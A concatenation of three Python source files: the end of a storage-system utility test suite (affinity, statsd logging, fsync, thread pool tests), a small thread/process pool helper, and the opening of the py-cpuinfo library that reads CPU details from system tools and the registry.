dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_single_region(self):
keyfn = utils.affinity_key_function("r3=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 5, 0, 1, 2, 3, 6, 7], ids)
def test_bogus_value(self):
self.assertRaises(ValueError,
utils.affinity_key_function, "r3")
self.assertRaises(ValueError,
utils.affinity_key_function, "r3=elephant")
def test_empty_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function("")
self.assert_(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_all_whitespace_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function(" \n")
self.assert_(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_with_zone_zero(self):
keyfn = utils.affinity_key_function("r4z0=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([6, 0, 1, 2, 3, 4, 5, 7], ids)
def test_multiple(self):
keyfn = utils.affinity_key_function("r1=100, r4=200, r3z1=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 0, 1, 6, 7, 2, 3, 5], ids)
def test_more_specific_after_less_specific(self):
keyfn = utils.affinity_key_function("r2=100, r2z2=50")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([3, 2, 0, 1, 4, 5, 6, 7], ids)
class TestAffinityLocalityPredicate(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_empty(self):
pred = utils.affinity_locality_predicate('')
self.assert_(pred is None)
def test_region(self):
pred = utils.affinity_locality_predicate('r1')
self.assert_(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1], ids)
def test_zone(self):
pred = utils.affinity_locality_predicate('r1z1')
self.assert_(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0], ids)
def test_multiple(self):
pred = utils.affinity_locality_predicate('r1, r3, r4z0')
self.assert_(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1, 4, 5, 6], ids)
def test_invalid(self):
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'falafel')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r8zQ')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r2d2')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r1z1=1')
class TestGreenthreadSafeIterator(unittest.TestCase):
def increment(self, iterable):
plus_ones = []
for n in iterable:
plus_ones.append(n + 1)
return plus_ones
def test_setup_works(self):
# it should work without concurrent access
self.assertEquals([0, 1, 2, 3], list(UnsafeXrange(4)))
iterable = UnsafeXrange(10)
pile = eventlet.GreenPile(2)
for _ in xrange(2):
pile.spawn(self.increment, iterable)
try:
sorted([resp for resp in pile])
self.assertTrue(False, "test setup is insufficiently crazy")
except ValueError:
pass
def test_access_is_serialized(self):
pile = eventlet.GreenPile(2)
iterable = utils.GreenthreadSafeIterator(UnsafeXrange(10))
for _ in xrange(2):
pile.spawn(self.increment, iterable)
response = sorted(sum([resp for resp in pile], []))
self.assertEquals(range(1, 11), response)
class TestStatsdLoggingDelegation(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind(('localhost', 0))
self.port = self.sock.getsockname()[1]
self.queue = Queue()
self.reader_thread = threading.Thread(target=self.statsd_reader)
self.reader_thread.setDaemon(1)
self.reader_thread.start()
def tearDown(self):
# The "no-op when disabled" test doesn't set up a real logger, so
# create one here so we can tell the reader thread to stop.
if not getattr(self, 'logger', None):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.logger.increment('STOP')
self.reader_thread.join(timeout=4)
self.sock.close()
del self.logger
def statsd_reader(self):
while True:
try:
payload = self.sock.recv(4096)
if payload and 'STOP' in payload:
return 42
self.queue.put(payload)
except Exception as e:
sys.stderr.write('statsd_reader thread: %r' % (e,))
break
def _send_and_get(self, sender_fn, *args, **kwargs):
"""
Because the client library may not actually send a packet with
sample_rate < 1, we keep trying until we get one through.
"""
got = None
while not got:
sender_fn(*args, **kwargs)
try:
got = self.queue.get(timeout=0.5)
except Empty:
pass
return got
def assertStat(self, expected, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
return self.assertEqual(expected, got)
def assertStatMatches(self, expected_regexp, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
return self.assert_(re.search(expected_regexp, got),
[got, expected_regexp])
def test_methods_are_no_ops_when_not_enabled(self):
logger = utils.get_logger({
# No "log_statsd_host" means "disabled"
'log_statsd_port': str(self.port),
}, 'some-name')
# Delegate methods are no-ops
self.assertEqual(None, logger.update_stats('foo', 88))
self.assertEqual(None, logger.update_stats('foo', 88, 0.57))
self.assertEqual(None, logger.update_stats('foo', 88,
sample_rate=0.61))
self.assertEqual(None, logger.increment('foo'))
self.assertEqual(None, logger.increment('foo', 0.57))
self.assertEqual(None, logger.increment('foo', sample_rate=0.61))
self.assertEqual(None, logger.decrement('foo'))
self.assertEqual(None, logger.decrement('foo', 0.57))
self.assertEqual(None, logger.decrement('foo', sample_rate=0.61))
self.assertEqual(None, logger.timing('foo', 88.048))
self.assertEqual(None, logger.timing('foo', 88.57, 0.34))
self.assertEqual(None, logger.timing('foo', 88.998, sample_rate=0.82))
self.assertEqual(None, logger.timing_since('foo', 8938))
self.assertEqual(None, logger.timing_since('foo', 8948, 0.57))
self.assertEqual(None, logger.timing_since('foo', 849398,
sample_rate=0.61))
# Now, the queue should be empty (no UDP packets sent)
self.assertRaises(Empty, self.queue.get_nowait)
def test_delegate_methods_with_no_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.assertStat('some-name.some.counter:1|c', self.logger.increment,
'some.counter')
self.assertStat('some-name.some.counter:-1|c', self.logger.decrement,
'some.counter')
self.assertStat('some-name.some.operation:4900.0|ms',
self.logger.timing, 'some.operation', 4.9 * 1000)
self.assertStatMatches('some-name\.another\.operation:\d+\.\d+\|ms',
self.logger.timing_since, 'another.operation',
time.time())
self.assertStat('some-name.another.counter:42|c',
self.logger.update_stats, 'another.counter', 42)
# Each call can override the sample_rate (also, bonus prefix test)
self.logger.set_statsd_prefix('pfx')
self.assertStat('pfx.some.counter:1|c|@0.972', self.logger.increment,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.counter:-1|c|@0.972', self.logger.decrement,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.operation:4900.0|ms|@0.972',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.972)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.972',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.972)
self.assertStat('pfx.another.counter:3|c|@0.972',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.972)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.939', self.logger.increment,
'some.counter', 0.939)
self.assertStat('some.counter:-1|c|@0.939', self.logger.decrement,
'some.counter', 0.939)
self.assertStat('some.operation:4900.0|ms|@0.939',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.939)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.939',
self.logger.timing_since, 'another.op',
time.time(), 0.939)
self.assertStat('another.counter:3|c|@0.939',
self.logger.update_stats, 'another.counter', 3, 0.939)
def test_delegate_methods_with_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_default_sample_rate': '0.93',
}, 'pfx')
self.assertStat('pfx.some.counter:1|c|@0.93', self.logger.increment,
'some.counter')
self.assertStat('pfx.some.counter:-1|c|@0.93', self.logger.decrement,
'some.counter')
self.assertStat('pfx.some.operation:4760.0|ms|@0.93',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.93',
self.logger.timing_since, 'another.op',
time.time())
self.assertStat('pfx.another.counter:3|c|@0.93',
self.logger.update_stats, 'another.counter', 3)
# Each call can override the sample_rate
self.assertStat('pfx.some.counter:1|c|@0.9912', self.logger.increment,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.counter:-1|c|@0.9912', self.logger.decrement,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('pfx.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.987654', self.logger.increment,
'some.counter', 0.987654)
self.assertStat('some.counter:-1|c|@0.987654', self.logger.decrement,
'some.counter', 0.987654)
self.assertStat('some.operation:4900.0|ms|@0.987654',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.987654)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.987654',
self.logger.timing_since, 'another.op',
time.time(), 0.987654)
self.assertStat('another.counter:3|c|@0.987654',
self.logger.update_stats, 'another.counter',
3, 0.987654)
def test_delegate_methods_with_metric_prefix(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_metric_prefix': 'alpha.beta',
}, 'pfx')
self.assertStat('alpha.beta.pfx.some.counter:1|c',
self.logger.increment, 'some.counter')
self.assertStat('alpha.beta.pfx.some.counter:-1|c',
self.logger.decrement, 'some.counter')
self.assertStat('alpha.beta.pfx.some.operation:4760.0|ms',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches(
'alpha\.beta\.pfx\.another\.op:\d+\.\d+\|ms',
self.logger.timing_since, 'another.op', time.time())
self.assertStat('alpha.beta.pfx.another.counter:3|c',
self.logger.update_stats, 'another.counter', 3)
self.logger.set_statsd_prefix('')
self.assertStat('alpha.beta.some.counter:1|c|@0.9912',
self.logger.increment, 'some.counter',
sample_rate=0.9912)
self.assertStat('alpha.beta.some.counter:-1|c|@0.9912',
self.logger.decrement, 'some.counter', 0.9912)
self.assertStat('alpha.beta.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('alpha\.beta\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('alpha.beta.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
def test_get_valid_utf8_str(self):
unicode_sample = u'\uc77c\uc601'
valid_utf8_str = unicode_sample.encode('utf-8')
invalid_utf8_str = unicode_sample.encode('utf-8')[::-1]
self.assertEquals(valid_utf8_str,
utils.get_valid_utf8_str(valid_utf8_str))
self.assertEquals(valid_utf8_str,
utils.get_valid_utf8_str(unicode_sample))
self.assertEquals('\xef\xbf\xbd\xef\xbf\xbd\xec\xbc\x9d\xef\xbf\xbd',
utils.get_valid_utf8_str(invalid_utf8_str))
def test_thread_locals(self):
logger = utils.get_logger(None)
orig_thread_locals = logger.thread_locals
try:
self.assertEquals(logger.thread_locals, (None, None))
logger.txn_id = '1234'
logger.client_ip = '1.2.3.4'
self.assertEquals(logger.thread_locals, ('1234', '1.2.3.4'))
logger.txn_id = '5678'
logger.client_ip = '5.6.7.8'
self.assertEquals(logger.thread_locals, ('5678', '5.6.7.8'))
finally:
logger.thread_locals = orig_thread_locals
def test_no_fdatasync(self):
called = []
class NoFdatasync:
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.os', NoFdatasync()):
with patch('swift.common.utils.fsync', fsync):
utils.fdatasync(12345)
self.assertEquals(called, [12345])
def test_yes_fdatasync(self):
called = []
class YesFdatasync:
def fdatasync(self, fd):
called.append(fd)
with patch('swift.common.utils.os', YesFdatasync()):
utils.fdatasync(12345)
self.assertEquals(called, [12345])
def test_fsync_bad_fullsync(self):
class FCNTL:
F_FULLSYNC = 123
def fcntl(self, fd, op):
raise IOError(18)
with patch('swift.common.utils.fcntl', FCNTL()):
self.assertRaises(OSError, lambda: utils.fsync(12345))
def test_fsync_f_fullsync(self):
called = []
class FCNTL:
F_FULLSYNC = 123
def fcntl(self, fd, op):
called[:] = [fd, op]
return 0
with patch('swift.common.utils.fcntl', FCNTL()):
utils.fsync(12345)
self.assertEquals(called, [12345, 123])
def test_fsync_no_fullsync(self):
called = []
class FCNTL:
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.fcntl', FCNTL()):
with patch('os.fsync', fsync):
utils.fsync(12345)
self.assertEquals(called, [12345])
class TestThreadpool(unittest.TestCase):
def _thread_id(self):
return threading.current_thread().ident
def _capture_args(self, *args, **kwargs):
return {'args': args, 'kwargs': kwargs}
def _raise_valueerror(self):
return int('fishcakes')
def test_run_in_thread_with_threads(self):
tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertNotEquals(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_force_run_in_thread_with_threads(self):
# with nthreads > 0, force_run_in_thread looks just like run_in_thread
tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEquals(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.force_run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_run_in_thread_without_threads(self):
# with zero threads, run_in_thread doesn't actually do so
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertEquals(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_force_run_in_thread_without_threads(self):
# with zero threads, force_run_in_thread uses eventlet.tpool
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEquals(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.force_run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
if __name__ == '__main__':
unittest.main()
|
utils.py
|
#!/usr/bin/env python
#coding:utf-8
"""
Author: --<v1ll4n>
Purpose: Provide some useful utils
Created: 2016/10/29
"""
import uuid
import time
import unittest
from Queue import Queue
import threading
import multiprocessing
from threading import Thread
from multiprocessing import Process
#----------------------------------------------------------------------
def start_thread(func, *args, **kwargs):
""""""
Thread(target=func, args=args, kwargs=kwargs).start()
########################################################################
class Pool(object):
"""Thread or Proccess Pool to support the
concurrence of many tasks"""
#----------------------------------------------------------------------
def __init__(self, thread_max=50, mode='Thread'):
"""Constructor"""
modes = ['thread', 'process']
self.mode = mode.lower() if mode in modes else 'thread'
self.task_list = []
self.result_queue = Queue()
self.signal_name = self._uuid1_str()
self.lock = threading.Lock() if self.mode == 'thread' else multiprocessing.Lock()
self.thread_max = thread_max
self.current_thread_count = 0
def _uuid1_str(self):
'''Returns: random UUID tag '''
return str(uuid.uuid1())
def add_task(self, func, *args, **argv):
'''Add task to Pool and wait to exec
Params:
func : A callable obj, the entity of the current task
args : the args of [func]
argv : the argv of [func]
'''
assert callable(func), '[!] Function can \'t be called'
ret = {}
ret['func'] = func
ret['args'] = args
ret['argv'] = argv
ret['uuid'] = self.signal_name
self.task_list.append(ret)
def run(self):
""""""
Thread(target=self._run).start()
return self.result_queue
#----------------------------------------------------------------------
def _run(self):
""""""
for i in self.task_list:
#print self.current_thread_count
while self.thread_max <= self.current_thread_count:
time.sleep(0.3)
self._start_task(i)
def _start_task(self, task):
""""""
self.current_thread_count = self.current_thread_count + 1
try:
if self.mode == 'thread':
#print 'Start'
Thread(target=self._worker, args=(task,)).start()
elif self.mode == 'process':
Process(target=self._worker, args=(task,)).start()
except TypeError:
self.current_thread_count = self.current_thread_count - 1
def _worker(self, dictobj):
""""""
func = dictobj['func']
args = dictobj['args']
argv = dictobj['argv']
result = func(*args, **argv)
self.lock.acquire()
self._add_result_to_queue(result=result)
self.lock.release()
def _add_result_to_queue(self, **kw):
""""""
assert kw.has_key('result'), '[!] Result Error!'
self.result_queue.put(kw['result'])
self.current_thread_count = self.current_thread_count - 1
class UtilsTest(unittest.case.TestCase):
def runTest(self):
ms = inspect.getmembers(self)
ms = map(lambda x: x[0], ms)
for i in ms:
if callable(eval('self.'+i)):
if i.startswith('test_'):
eval('self.' + i + '()')
def test_pool(self):
def demo_task(*args):
'''simulate the plugin.run'''
print '[!] Computing!'
time.sleep(args[0])
print '[!] Finished!'
print
returns = 'Runtime Length : %s' % str(args)
return returns
pool = Pool(mode='thread')
pool.add_task(demo_task, 7)
pool.add_task(demo_task, 3)
q = pool.run()
print pool.current_thread_count
self.assertIsInstance(q, Queue)
r = q.get()
print r
self.assertIsInstance(r, str)
r = q.get()
print r
self.assertIsInstance(r, str)
print pool.current_thread_count
if __name__ == '__main__':
unittest.main()
|
cpuinfo.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2014-2018, Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CPUINFO_VERSION = (4, 0, 0)
import os, sys
import glob
import re
import time
import platform
import multiprocessing
import ctypes
import pickle
import base64
import subprocess
try:
import _winreg as winreg
except ImportError as err:
try:
import winreg
except ImportError as err:
pass
PY2 = sys.version_info[0] == 2
# Load hacks for Windows
if platform.system().lower() == 'windows':
# Monkey patch multiprocessing's Popen to fork properly on Windows Pyinstaller
# https://github.com/pyinstaller/pyinstaller/wiki/Recipe-Multiprocessing
try:
import multiprocessing.popen_spawn_win32 as forking
except ImportError as err:
try:
import multiprocessing.popen_fork as forking
except ImportError as err:
import multiprocessing.forking as forking
class _Popen(forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
# We have to set original _MEIPASS2 value from sys._MEIPASS
# to get --onefile mode working.
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
# On some platforms (e.g. AIX) 'os.unsetenv()' is not
# available. In those cases we cannot delete the variable
# but only set it to the empty string. The bootloader
# can handle this case.
if hasattr(os, 'unsetenv'):
os.unsetenv('_MEIPASS2')
else:
os.putenv('_MEIPASS2', '')
forking.Popen = _Popen
class DataSource(object):
bits = platform.architecture()[0]
cpu_count = multiprocessing.cpu_count()
is_windows = platform.system().lower() == 'windows'
raw_arch_string = platform.machine()
can_cpuid = True
@staticmethod
def has_proc_cpuinfo():
return os.path.exists('/proc/cpuinfo')
@staticmethod
def has_dmesg():
return len(program_paths('dmesg')) > 0
@staticmethod
def has_var_run_dmesg_boot():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
return 'linux' in uname and os.path.exists('/var/run/dmesg.boot')
@staticmethod
def has_cpufreq_info():
return len(program_paths('cpufreq-info')) > 0
@staticmethod
def has_sestatus():
return len(program_paths('sestatus')) > 0
@staticmethod
def has_sysctl():
return len(program_paths('sysctl')) > 0
@staticmethod
def has_isainfo():
return len(program_paths('isainfo')) > 0
@staticmethod
def has_kstat():
return len(program_paths('kstat')) > 0
@staticmethod
def has_sysinfo():
return len(program_paths('sysinfo')) > 0
@staticmethod
def has_lscpu():
return len(program_paths('lscpu')) > 0
@staticmethod
def has_ibm_pa_features():
return len(program_paths('lsprop')) > 0
@staticmethod
def has_wmic():
returncode, output = run_and_get_stdout(['wmic', 'os', 'get', 'Version'])
return returncode == 0 and len(output) > 0
@staticmethod
def cat_proc_cpuinfo():
return run_and_get_stdout(['cat', '/proc/cpuinfo'])
@staticmethod
def cpufreq_info():
return run_and_get_stdout(['cpufreq-info'])
@staticmethod
def sestatus_allow_execheap():
return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execheap"'])[1].strip().lower().endswith('on')
@staticmethod
def sestatus_allow_execmem():
return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execmem"'])[1].strip().lower().endswith('on')
@staticmethod
def dmesg_a():
return run_and_get_stdout(['dmesg', '-a'])
@staticmethod
def cat_var_run_dmesg_boot():
return run_and_get_stdout(['cat', '/var/run/dmesg.boot'])
@staticmethod
def sysctl_machdep_cpu_hw_cpufrequency():
return run_and_get_stdout(['sysctl', 'machdep.cpu', 'hw.cpufrequency'])
@staticmethod
def isainfo_vb():
return run_and_get_stdout(['isainfo', '-vb'])
@staticmethod
def kstat_m_cpu_info():
return run_and_get_stdout(['kstat', '-m', 'cpu_info'])
@staticmethod
def sysinfo_cpu():
return run_and_get_stdout(['sysinfo', '-cpu'])
@staticmethod
def lscpu():
return run_and_get_stdout(['lscpu'])
@staticmethod
def ibm_pa_features():
ibm_features = glob.glob('/proc/device-tree/cpus/*/ibm,pa-features')
if ibm_features:
return run_and_get_stdout(['lsprop', ibm_features[0]])
@staticmethod
def wmic_cpu():
return run_and_get_stdout(['wmic', 'cpu', 'get', 'Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer', '/format:list'])
@staticmethod
def winreg_processor_brand():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
processor_brand = winreg.QueryValueEx(key, "ProcessorNameString")[0]
winreg.CloseKey(key)
return processor_brand
@staticmethod
def winreg_vendor_id():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
vendor_id = winreg.QueryValueEx(key, "VendorIdentifier")[0]
winreg.CloseKey(key)
return vendor_id
@staticmethod
def winreg_raw_arch_string():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment")
raw_arch_string = winreg.QueryValueEx(key, "PROCESSOR_ARCHITECTURE")[0]
winreg.CloseKey(key)
return raw_arch_string
@staticmethod
def winreg_hz_actual():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
hz_actual = winreg.QueryValueEx(key, "~Mhz")[0]
winreg.CloseKey(key)
hz_actual = to_hz_string(hz_actual)
return hz_actual
@staticmethod
def winreg_feature_bits():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
feature_bits = winreg.QueryValueEx(key, "FeatureSet")[0]
winreg.CloseKey(key)
return feature_bits
def obj_to_b64(thing):
a = thing
b = pickle.dumps(a)
c = base64.b64encode(b)
d = c.decode('utf8')
return d
def b64_to_obj(thing):
try:
a = base64.b64decode(thing)
b = pickle.loads(a)
return b
except:
return {}
def run_and_get_stdout(command, pipe_command=None):
if not pipe_command:
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = p1.communicate()[0]
if not PY2:
output = output.decode(encoding='UTF-8')
return p1.returncode, output
else:
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
p2 = subprocess.Popen(pipe_command, stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output = p2.communicate()[0]
if not PY2:
output = output.decode(encoding='UTF-8')
return p2.returncode, output
def program_paths(program_name):
paths = []
exts = filter(None, os.environ.get('PATHEXT', '').split(os.pathsep))
path = os.environ['PATH']
for p in os.environ['PATH'].split(os.pathsep):
p = os.path.join(p, program_name)
if os.access(p, os.X_OK):
paths.append(p)
for e in exts:
pext = p + e
if os.access(pext, os.X_OK):
paths.append(pext)
return paths
def _get_field_actual(cant_be_number, raw_string, field_names):
for line in raw_string.splitlines():
for field_name in field_names:
field_name = field_name.lower()
if ':' in line:
left, right = line.split(':', 1)
left = left.strip().lower()
right = right.strip()
if left == field_name and len(right) > 0:
if cant_be_number:
if not right.isdigit():
return right
else:
return right
return None
def _get_field(cant_be_number, raw_string, convert_to, default_value, *field_names):
retval = _get_field_actual(cant_be_number, raw_string, field_names)
# Convert the return value
if retval and convert_to:
try:
retval = convert_to(retval)
except:
retval = default_value
# Return the default if there is no return value
if retval is None:
retval = default_value
return retval
def _get_hz_string_from_brand(processor_brand):
# Just return 0 if the processor brand does not have the Hz
if not 'hz' in processor_brand.lower():
return (1, '0.0')
hz_brand = processor_brand.lower()
scale = 1
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
if '@' in hz_brand:
hz_brand = hz_brand.split('@')[1]
else:
hz_brand = hz_brand.rsplit(None, 1)[1]
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = to_hz_string(hz_brand)
return (scale, hz_brand)
def to_friendly_hz(ticks, scale):
# Get the raw Hz as a string
left, right = to_raw_hz(ticks, scale)
ticks = '{0}.{1}'.format(left, right)
# Get the location of the dot, and remove said dot
dot_index = ticks.index('.')
ticks = ticks.replace('.', '')
# Get the Hz symbol and scale
symbol = "Hz"
scale = 0
if dot_index > 9:
symbol = "GHz"
scale = 9
elif dot_index > 6:
symbol = "MHz"
scale = 6
elif dot_index > 3:
symbol = "KHz"
scale = 3
# Get the Hz with the dot at the new scaled point
ticks = '{0}.{1}'.format(ticks[:-scale-1], ticks[-scale-1:])
# Format the ticks to have 4 numbers after the decimal
# and remove any superfluous zeroes.
ticks = '{0:.4f} {1}'.format(float(ticks), symbol)
ticks = ticks.rstrip('0')
return ticks
def to_raw_hz(ticks, scale):
# Scale the numbers
ticks = ticks.lstrip('0')
old_index = ticks.index('.')
ticks = ticks.replace('.', '')
ticks = ticks.ljust(scale + old_index+1, '0')
new_index = old_index + scale
ticks = '{0}.{1}'.format(ticks[:new_index], ticks[new_index:])
left, right = ticks.split('.')
left, right = int(left), int(right)
return (left, right)
def to_hz_string(ticks):
# Convert to string
ticks = '{0}'.format(ticks)
# Add decimal if missing
if '.' not in ticks:
ticks = '{0}.0'.format(ticks)
# Remove trailing zeros
ticks = ticks.rstrip('0')
# Add one trailing zero for empty right side
if ticks.endswith('.'):
ticks = '{0}0'.format(ticks)
return ticks
def to_friendly_bytes(input):
if not input:
return input
input = "{0}".format(input)
formats = {
r"^[0-9]+B$" : 'B',
r"^[0-9]+K$" : 'KB',
r"^[0-9]+M$" : 'MB',
r"^[0-9]+G$" : 'GB'
}
for pattern, friendly_size in formats.items():
if re.match(pattern, input):
return "{0} {1}".format(input[ : -1].strip(), friendly_size)
return input
def _parse_cpu_string(cpu_string):
# Get location of fields at end of string
fields_index = cpu_string.find('(', cpu_string.find('@'))
#print(fields_index)
# Processor Brand
processor_brand = cpu_string
if fields_index != -1:
processor_brand = cpu_string[0 : fields_index].strip()
#print('processor_brand: ', processor_brand)
fields = None
if fields_index != -1:
fields = cpu_string[fields_index : ]
#print('fields: ', fields)
# Hz
scale, hz_brand = _get_hz_string_from_brand(processor_brand)
# Various fields
vendor_id, stepping, model, family = (None, None, None, None)
if fields:
try:
fields = fields.rsplit('(', 1)[1].split(')')[0].split(',')
fields = [f.strip().lower() for f in fields]
fields = [f.split(':') for f in fields]
fields = [{f[0].strip() : f[1].strip()} for f in fields]
#print('fields: ', fields)
for field in fields:
name = list(field.keys())[0]
